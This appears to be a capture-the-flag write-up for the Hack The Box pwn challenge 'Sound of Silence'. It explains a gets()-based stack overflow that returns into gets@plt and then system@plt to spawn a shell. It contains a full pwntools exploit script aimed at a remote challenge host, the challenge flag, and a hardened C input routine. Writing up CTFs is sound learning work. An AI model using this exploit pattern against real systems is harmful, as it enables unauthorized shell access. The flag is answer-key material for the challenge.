Pwn - Sound of Silence

Medium

Description

Navigate the shadows in a dimly lit room, silently evading detection as you strategize to outsmart your foes. Employ clever distractions to divert their attention, paving the way for your daring escape!

Solution

Checksec

Firstly, the binary has Full RELRO, so the GOT is read-only and there are no GOT overwrites, and NX is enabled, which means we can't execute shellcode on the stack.

main()

The program is relatively simple: it has system() and gets() but no 'win' function. To pwn this we likely need to get the program to execute system('/bin/sh'). There wasn't any gadget that could modify rdi, which made the challenge a little tough. (After the event, someone noted that there is a mov rdi, rax gadget in the main function; interestingly, ROPgadget did not pick it up, but we could have used it if we wanted to.)

The only gadget which is not so useful.

But we don't actually need a ROP gadget. gets() leaves the address of its input buffer in rdi, so if system() runs right after gets() returns, whatever we just typed is its argument. This makes it very easy.
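As an added example (not from the writeup or the challenge binary), here is the hardened form of the input routine: the challenge's gets() copies the whole line into the stack buffer, which is what lets 40 bytes of padding reach the saved return address, while a bounded fgets()-based reader caps the copy at the buffer size and discards the excess. BUF_SIZE, read_line_bounded and read_line_from_string are assumed names, not taken from the binary.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Assumed layout, mirroring the writeup: a 32-byte stack buffer with the saved
 * return address 40 bytes from its start. The challenge reads into it with
 * gets(buf), which copies the whole line regardless of length, so 40 bytes of
 * padding followed by two addresses overwrite the return address. gets() is
 * kept out of the compiled code here (it was removed in C11). */
#define BUF_SIZE 32

/* Hardened reader (hypothetical name): copies at most size-1 bytes, strips the
 * trailing newline, and drains the rest of an over-long line so the leftover
 * bytes are not picked up by the next read. Returns 0 on success, 1 if the
 * line was truncated, -1 on EOF or error before anything was read. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    /* No newline in the buffer: the line was longer than size-1 bytes
     * (or ended at EOF). Consume the remainder without storing it. */
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated;
}

/* Test helper: run the reader over a constructed in-memory line. */
int read_line_from_string(const char *input, char *buf, size_t size)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL)
        return -1;
    int rc = read_line_bounded(buf, size, in);
    fclose(in);
    return rc;
}
```

With the bounded reader, a 40-byte line is cut at 31 bytes and never reaches the saved return address, so the same payload no longer changes control flow.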

Another interesting thing to note is that if we just pass "/bin/sh" to gets(), the 5th character comes back shifted down by one ('/' turned into '.').

'/bin/sh' became '/bin.sh'

To overcome this we just need to send "/bin0sh" instead: '0' (0x30) shifted down by one is '/' (0x2f), so the buffer ends up holding "/bin/sh".

from pwn import *

exe = './sound_of_silence'
elf = context.binary = ELF(exe, checksec=False)
# context.log_level = 'debug'

# Distance from the start of the input buffer to the saved return address.
offset = 40

# io = process(exe)
io = remote("94.237.63.93", 59792)

# Return into gets@plt: rdi still points at the input buffer, so the next
# line lands there; gets() then returns into system@plt, which takes the
# same rdi as its argument.
payload = b'A' * offset
payload += p64(elf.plt.gets)
payload += p64(elf.plt.system)

io.sendlineafter(b'>> ', payload)
# The 5th byte is shifted down by one, so '0' (0x30) becomes '/' (0x2f).
io.sendline(b'/bin0sh')

io.interactive()

Pwned

Flag: HTB{n0_n33d_4_l34k5_wh3n_u_h4v3_5y5t3m}
